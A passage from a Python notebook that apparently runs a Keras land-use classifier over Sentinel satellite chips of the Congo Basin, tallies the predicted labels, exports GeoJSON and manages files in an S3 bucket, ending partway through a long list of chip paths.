Add NDVI band to end of array rast = np.concatenate((data,[ndvi]),axis=0) rast = rast.astype(rio.uint16) return rast ``` # Download Model Files ``` model_url = "s3://canopy-production-ml/inference/model_files/model-best.h5" weights_url = 
"s3://canopy-production-ml/inference/model_files/model_weights_best.h5" download_model(model_url,weights_url) model = load_model("model.h5","model_weights.h5") label_list = ["Industrial_agriculture","ISL","Mining","Roads","Shifting_cultivation"] def output_windows(granule_dir,patch_size=100, stride=100,SAVE=False,SAVE_INDIVIDUAL=False, bands=[2, 3, 4, 8, 11, 12], model=model, predict_thresh=.5, label_list=label_list, job_name="test_inference_unwarped", output_filename="./inference_output/result.json"): granule_list = glob(f'{granule_dir}/*.tif') output_dict = {} granule_id_list = [] window_id_list = [] window_geom_list = [] data_list = [] label_master_list = [] gdf_list = [] timestamp = gen_timestamp() for j,granule_path in enumerate(granule_list[0:1]): granule_id = granule_path.split("/")[-1].split("_")[0] with rio.open(granule_path) as src: with WarpedVRT(src, crs='EPSG:3257', resampling=Resampling.nearest) as vrt: windows = get_windows(vrt.shape, (patch_size, patch_size), (stride, stride)) for i, window in enumerate(windows): print(f"predicting window {i + 1} of {len(windows)} of granulate {j + 1} of {len(granule_list)}",end='\r', flush=True) label_name_list = [] window_id = i+1 data = vrt.read(bands,window=window, masked=True) data = add_ndvi(data) shape = data.shape new_shape = (data.shape[0],patch_size,patch_size) if shape != new_shape: filled_array = np.full(new_shape, 0) filled_array[:shape[0],:shape[1],:shape[2]] = data data = filled_array window = Window(window.col_off,window.row_off,shape[2],shape[1]) #image pre-processing / inference prediction = model.predict(read_image_tf_out(data)) prediction = np.where(prediction > predict_thresh, 1, 0) prediction_i = np.where(prediction == 1)[1] for i in prediction_i: label_name_list.append(label_list[i]) label_master_list.append(label_name_list) #vectorizing raster bounds for visualization window_bounds = rio.windows.bounds(window, vrt.transform, height=patch_size, width=patch_size) geom = box(*window_bounds) 
geom_coords = list(geom.exterior.coords) # window_geom_list.append(geom) #create or append to dict.... if granule_id in output_dict: output_dict[granule_id].append({"window_id":window_id,"polygon_coords":geom_coords,"labels":label_name_list}) else: output_dict[granule_id] = [{"window_id":window_id,"polygon_coords":geom_coords,"labels":label_name_list}] save_to_s3(output_dict,output_filename,job_name,timestamp) # gdf = gpd.GeoDataFrame({"granule_id":granule_id_list,"window_id":window_id_list,"geometry":window_geom_list,"labels":label_master_list}) # gdf["labels"] = gdf["labels"].astype(str) # gdf_list.append(gdf) return output_dict # granule_dir = "./efs_inference_data/" granule_dir = "/Volumes/Lacie/zhenyadata/Project_Canopy_Data/PC_Data/Inference/granule_test(unwarped)" output_dict = output_windows(granule_dir,output_filename="./inference_output/result-warped.json") output_dict data = output_dict count = {} label_match_results = [] granule_count = len(data.keys()) granule_list = data.keys() count["granule_count"] = granule_count for k1 in list(data.keys()): for i in range(len(data[k1])): if len(data[k1][i]['labels']) == 0: if "null_chips" not in count.keys(): count["null_chips"] = 1 else: count["null_chips"] += 1 for label in data[k1][i]['labels']: if label not in count.keys(): count[label] = 1 else: count[label] += 1 count for i in range (len(output_dict['101'])): print(output_dict['101'][i]['labels']) new_gdf.shape gdf.plot() new_gdf.to_file("./inference_output/test.geojson", driver='GeoJSON') gdf.to_file("./inference_output/test.geojson", driver='GeoJSON') ``` # Read Output Files ``` def process_output_files(json_path=None,download=False, filepath = "predict_test-2021-05-10-22-38-41.json", label_match="ISL"): s3 = boto3.resource('s3') #Download Model, Weights if download: bucket = json_path.split("/")[2] model_key = "/".join(json_path.split("/")[3:]) filename = json_path.split("/")[-1] s3.Bucket(bucket).download_file(model_key, filename ) filepath = filename 
    with open(filepath) as jsonfile:
        data = json.load(jsonfile)
    count = {}
    label_match_results = []
    granule_count = len(data.keys())
    granule_list = data.keys()
    count["granule_count"] = granule_count
    for k1 in list(data.keys()):
        for i in range(len(data[k1])):
            # Chips with an empty prediction list are counted as "null_chips".
            if len(data[k1][i]['predicted_labels']) == 0:
                if "null_chips" not in count.keys():
                    count["null_chips"] = 1
                else:
                    count["null_chips"] += 1
            for label in data[k1][i]['predicted_labels']:
                if label == label_match:
                    label_match_results.append([k1,data[k1][i]])
                if label not in count.keys():
                    count[label] = 1
                else:
                    count[label] += 1
    return count, label_match_results, granule_list, data

json_path = "s3://canopy-production-ml/inference/output/predict_3257-2021-05-15-22-18-23.json"
count, match_results, granule_list, data2 = process_output_files(download=False, json_path=json_path, filepath="/Users/purgatorid/Downloads/inference_output_test-2021-06-25-22-06-37.json")
data2["52"][0]
match_results
count
sum(count.values()) - 97

# Build a polygon for every matched window and export as GeoJSON,
# reprojecting from EPSG:3257 to EPSG:4326.
polygon_list = []
for result in match_results:
    coords = result[1]["polygon_coords"]
    polygon = Polygon(coords)
    polygon_list.append(polygon)
gdf = gpd.GeoDataFrame({"geometry":polygon_list})
gdf = gdf.set_crs(epsg=3257)
gdf = gdf.to_crs(epsg=4326)
gdf
gdf.to_file("./inference_output/test_warped.geojson", driver='GeoJSON')
data['test.tif'][0]["polygon_coords"]
```

# Get List of Non-Processed Granules

```
def s3_dir_ls(s3_dir_url):
    # List full s3:// URLs of the objects under a directory prefix.
    # The first entry is dropped — presumably the directory placeholder key;
    # verify against the bucket layout.
    objs = []
    bucket = s3_dir_url.split("/")[2]
    key = "/".join(s3_dir_url.split("/")[3:5])
    s3 = boto3.resource('s3')
    my_bucket = s3.Bucket(bucket)
    for obj in my_bucket.objects.filter(Prefix=key):
        objs.append("s3://" + bucket + "/" + obj.key)
    return objs[1:]

s3_dir_url = "s3://canopy-production-ml/full_congo_basin/02.17.21_CB_GEE_Pull/"
all_granules = s3_dir_ls(s3_dir_url)
granule_ids_completed = list(data.keys())

def get_granule_paths(granule_ids_completed, all_granules):
    # Return the paths whose granule id is not in the completed set.
    incomplete_granules = []
    for path in all_granules:
        granule_id = path.split("/")[-1].split("_")[0]
        if granule_id not
in granule_ids_completed:
            incomplete_granules.append(path)
    return incomplete_granules

incomplete_gran_paths = get_granule_paths(granule_ids_completed, all_granules)
# Write the not-yet-processed granule paths, one per line.
with open('incomplete_granules_3257.txt', 'w') as filehandle:
    for listitem in incomplete_gran_paths:
        filehandle.write('%s\n' % listitem)
```

# Output Vectorized Predicted Granules

```
def s3_dir_match(s3_dir_url, granule_list):
    # For every object under the prefix whose granule id appears in
    # `granule_list`, open the raster and record its bounding box;
    # return them as a GeoDataFrame.
    objs = []
    bucket = s3_dir_url.split("/")[2]
    key = "/".join(s3_dir_url.split("/")[3:5])
    s3 = boto3.resource('s3')
    my_bucket = s3.Bucket(bucket)
    window_geom_list = []
    granule_id_list = []
    for obj in my_bucket.objects.filter(Prefix=key):
        granule_id = obj.key.split("/")[-1].split("_")[0]
        if granule_id in granule_list:
            obj_url = "s3://" + bucket + "/" + obj.key
            with rio.open(obj_url) as src:
                bounds = src.bounds
            geom = box(*bounds)
            window_geom_list.append(geom)
            granule_id_list.append(granule_id)
    gdf = gpd.GeoDataFrame({"geometry":window_geom_list,"granule_id":granule_id_list})
    return gdf

gdf = s3_dir_match("s3://canopy-production-ml/full_congo_basin/02.17.21_CB_GEE_Pull/", granule_list)
gdf
gdf.to_file("granules.json", driver="GeoJSON", index=True)
```

# Create and Export GDF of Original Labels Data

```
# Load the hand-labelled polygons CSV and turn its GeoJSON-style "polygon"
# column into shapely geometries.
FILE_NAME = "/Users/purgatorid/Downloads/polygons_021521.csv"
df = pd.read_csv( FILE_NAME)
gdf = gpd.GeoDataFrame( df, crs={'init': 'epsg:4326'})
polygons = []
for polygon in df["polygon"]:
    polygons.append(Polygon(json.loads(polygon)["coordinates"][0]))
gdf["geometry"] = polygons
gdf.loc[90]
gdf.to_file("output.json", driver="GeoJSON", index=True)
```

# Load and Reproject One Granulate Containing ISL

```
def convert_raster(input_file, dest_dir, epsg_format='EPSG:3257', windows=False):
    """Converts the rasters in the src_dir into a different EPSG format, keeping the same folder structure and saving them in the dest_dir."""
    print(input_file)
    # Output name is hard-coded; every call overwrites dest_dir/test.tif.
    filename = "test.tif"
    # print(filename)
    # If the respective grouping folders are not available
    output_filepath = dest_dir + filename
print(output_filepath) # Finally, we convert converted = gdal.Warp(output_filepath, [input_file],format='GTiff', dstSRS=epsg_format, resampleAlg='near') converted = None print('Finished') granule = "/Users/purgatorid/Downloads/1241_full_congo_export_v12_all_bands_Feb_11_12_44_53_2021.tif" dest_dir = "/Users/purgatorid/Downloads/" convert_raster(granule,dest_dir) ``` # Visualize Results (Incomplete Code) ``` def visualize_results(match_results,s3_url): for window in match_results: granule_id = window[0] t = {1,2,4} ``` # Running Without Windows Code - Direct Chip Predict ``` model = load_model("model.h5","model_weights.h5") label_list = ["Industrial_agriculture","ISL","Mining","Roads","Shifting_cultivation"] def output_predictions(granule_dir=None,patch_size=100, stride=100,SAVE=False,SAVE_INDIVIDUAL=False, bands=[2, 3, 4, 8, 11, 12], model=model, predict_thresh=.5, label_list=label_list, job_name="test_inference", output_filename="./inference_output/result.json", apply_windows=False, read_process="read_img_tf_out", sample_frac=1, granule_list=None): if granule_list is None: granule_list = glob(f'{granule_dir}/*.tif') end = len(granule_list) // sample_frac granule_list = granule_list[0:end] # print(f"running inference on {len(granule_list)} chips") output_dict = {} granule_id_list = [] window_id_list = [] window_geom_list = [] data_list = [] label_master_list = [] gdf_list = [] timestamp = gen_timestamp() missed_chips = [] for j,granule_path in enumerate(granule_list): label_name_list = [] granule_id = granule_path.split("/")[-1].split("_")[0] filepath = granule_path.split("/")[-1] ground_label = granule_path.split("/")[2] print(f'Running inference on chip {j+1} of {len(granule_list)}',end='\r', flush=True) if filepath: with rio.open(granule_path) as src: data = src.read(bands,masked=True) data = add_ndvi(data) shape = data.shape if apply_windows: new_shape = (data.shape[0],patch_size,patch_size) if shape != new_shape: filled_array = np.full(new_shape, 0) 
                        filled_array[:shape[0], :shape[1], :shape[2]] = data
                        data = filled_array
                        # NOTE(review): `window` is never assigned in this code
                        # path before use — this line would raise if reached.
                        window = Window(window.col_off, window.row_off, shape[2], shape[1])
                #image pre-processing / inference
                if read_process == "read_img_tf_out":
                    read_func = read_image_tf_out
                else:
                    read_func = read_image
                prediction = model.predict(read_func(data))
                # print("original_prediction:",prediction)
                prediction = np.where(prediction > predict_thresh, 1, 0)
                # print("sigmoid prediction gate:",prediction)
                prediction_i = np.where(prediction == 1)[1]
                # Chips with no label above threshold are recorded as missed.
                if 1 not in np.where(prediction == 1)[1]:
                    missed_chips.append(granule_path)
                # print("index of matching labels:",prediction_i)
                for i in prediction_i:
                    label_name_list.append(label_list[i])
                # label_master_list.append(label_name_list)
                #vectorizing raster bounds for visualization
                data_bounds = src.bounds
                geom = box(*data_bounds)
                geom_coords = list(geom.exterior.coords)
                # window_geom_list.append(geom)
                #create or append to dict....
                if granule_id in output_dict:
                    output_dict[granule_id].append({"polygon_coords":geom_coords,"predicted_labels":label_name_list,"actual_label":ground_label})
                else:
                    output_dict[granule_id] = [{"polygon_coords":geom_coords,"predicted_labels":label_name_list,"actual_label":ground_label}]
        # NOTE(review): indentation reconstructed — saving appears to run per
        # chip; the commented alternative below saved every 1000 chips.
        save_to_s3(output_dict,output_filename,job_name,timestamp)
        # if j % 1000 == 0:
        #     save_to_s3(output_dict,output_filename,job_name,timestamp)
    # gdf = gpd.GeoDataFrame({"granule_id":granule_id_list,"window_id":window_id_list,"geometry":window_geom_list,"labels":label_master_list})
    # gdf["labels"] = gdf["labels"].astype(str)
    # gdf_list.append(gdf)
    return output_dict, missed_chips

# granule_dir = "./efs_inference_data/"
granule_dir_local = "/Volumes/Lacie/zhenyadata/Project_Canopy_Data/PC_Data/Sentinel_Data/Chips/misha_polygons_cloudfreemerge/yes/ISL/100/91/"
# granule_dir_efs =
output_dict, missed_chips = output_predictions(granule_dir_local)
# Persist the list of chips with no above-threshold prediction.
df = pd.DataFrame({"file_path":missed_chips})
df.to_csv("missed_chips.csv", index=False)

data = output_dict
count = {}
label_match_results =
[]
granule_count = len(data.keys())
granule_list = data.keys()
count["granule_count"] = granule_count
# NOTE(review): this tally reads ['labels'] but output_predictions stores the
# key 'predicted_labels' — confirm which key this dict actually carries.
for k1 in list(data.keys()):
    for i in range(len(data[k1])):
        if len(data[k1][i]['labels']) == 0:
            if "null_chips" not in count.keys():
                count["null_chips"] = 1
            else:
                count["null_chips"] += 1
        for label in data[k1][i]['labels']:
            if label not in count.keys():
                count[label] = 1
            else:
                count[label] += 1
count
```

#### Opening Chips from S3

```
bucket = 'canopy-production-ml'

def s3_actions(bucket, in_path=None, out_path=None, copy_list=None, copy_dir=False,
               delete=False, stop_at=None, chip_list=False, chip_count=False):
    # Multi-purpose S3 helper: depending on the flags, list keys under
    # `in_path` (chip_list), count them (chip_count), delete them (delete),
    # or copy the keys in `copy_list` from in_path to out_path.
    s3 = boto3.resource('s3')
    my_bucket = s3.Bucket(bucket)
    objs = []
    total_files = 0
    if copy_dir or delete or chip_list or chip_count:
        for obj in my_bucket.objects.filter(Prefix=in_path):
            total_files += 1
            objs.append(obj.key)
            # `stop_at` caps the enumeration (None never matches, so no cap).
            if total_files == stop_at:
                break
    tot_objs = len(objs)
    if delete:
        for index, obj in enumerate(objs, 1):
            print(f"deleting {index} of {tot_objs}", end='\r', flush=True)
            # NOTE(review): `obj` here is a key string from `objs`, not an
            # S3 object — .delete() on a str would fail; confirm intent.
            obj.delete()
    if chip_list:
        return objs
    if chip_count:
        return total_files
    if copy_list:
        total_copy_list = len(copy_list)
        for index, obj in enumerate(copy_list, 1):
            print(f"copying {index} of {total_copy_list}", end='\r', flush=True)
            old_key = in_path + obj
            new_key = out_path + obj
            CopySource = { 'Bucket': bucket, 'Key':old_key}
            my_bucket.copy(CopySource, new_key)

path = 'chips/cloudfree-merge-polygons/dataset_v2/'
full_chip_list = s3_actions(bucket, in_path=path, chip_list=True)
prepend = "s3://canopy-production-ml/"
full_chip_list = [prepend + i for i in full_chip_list]
# NOTE(review): removing from a list while iterating it skips elements —
# hence the second pass below that checks for leftover .csv entries.
for x in full_chip_list:
    if ".csv" in x:
        full_chip_list.remove(x)
        continue
for x in full_chip_list:
    if ".csv" in x:
        print(x)
# s3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/
# rio.open(f"s3://canopy-production-ml/{full_chip_list[1]}")
```

#### Running Infernece on All Labeled Data

```
# chips_dir_list = glob("./efs/*/100/*/*.tif")
output_dict,missed_chips =
output_predictions(granule_list=full_chip_list)
```

# Histogram for Numpy Array

```
data1.shape

def np_hist(arr, tensor=True):
    # Plot an overlaid histogram per band. With tensor=True the input is
    # converted to ndarray, element 0 of the batch is taken, and axes are
    # transposed to band-first layout before plotting.
    if tensor:
        arr = np.array(arr)
        arr = np.transpose(arr[0], (2, 1, 0))
    for i in range(arr.shape[0]):
        band_np = arr[i].flatten()
        plt.hist(band_np, label=str(i))
    plt.legend(prop={'size': 10})
    plt.show()

np_hist(data)
np_hist(data1, tensor=False)
```

# Retrieving Chips Missed on Inference Run

```
# Total number of chip records across all granules in `data`.
tot_len = 0
for key in data.keys():
    tot_len += len(data[key])
tot_len
len(full_chip_list)
full_chip_list[1]
data["79"]

def missing_chips(full_chip_list, data):
    # Compare (granule_id, actual_label) pairs present in `data` against the
    # full chip list; return chip paths never processed plus the missing ids.
    # assumes path components [5]/[3] are granule id / label folder — TODO confirm
    completed_chips = []
    for key in list(data.keys()):
        for completed_chip in data[key]:
            completed_chip_id = (key, completed_chip["actual_label"])
            if completed_chip_id not in completed_chips:
                completed_chips.append(completed_chip_id)
    total_chips = []
    for chip in full_chip_list[1:]:
        try:
            gran_id = chip.split("/")[5]
            actual_label = chip.split("/")[3]
            total_chip_id = (gran_id, actual_label)
            if total_chip_id not in total_chips:
                total_chips.append(total_chip_id)
        except:
            continue
    missing_chips = list(set(total_chips) - set(completed_chips))
    chips_to_process = []
    for missing_chip_id in missing_chips:
        for chip in full_chip_list[1:]:
            try:
                gran_id = chip.split("/")[5]
                actual_label = chip.split("/")[3]
                total_chip_id = (gran_id, actual_label)
                if missing_chip_id == total_chip_id:
                    if total_chip_id not in chips_to_process:
                        chips_to_process.append(chip)
            except:
                continue
    return chips_to_process, missing_chips

chips_to_process, missing_chips = missing_chips(full_chip_list, data)
missing_chips
prepend = "s3://canopy-production-ml/"
missing_chips_list = [prepend + i for i in chips_to_process]
output_dict, missed_chips = output_predictions(granule_list=missing_chips_list)
missing_chips_list
```

# Export True and False Positive on all 'ISL' labelled data

```
len(['s3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1000.tif',
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_700.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1000_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_2700.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1100_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1600.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_3700.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1200_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3100.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1300_900.tif', 
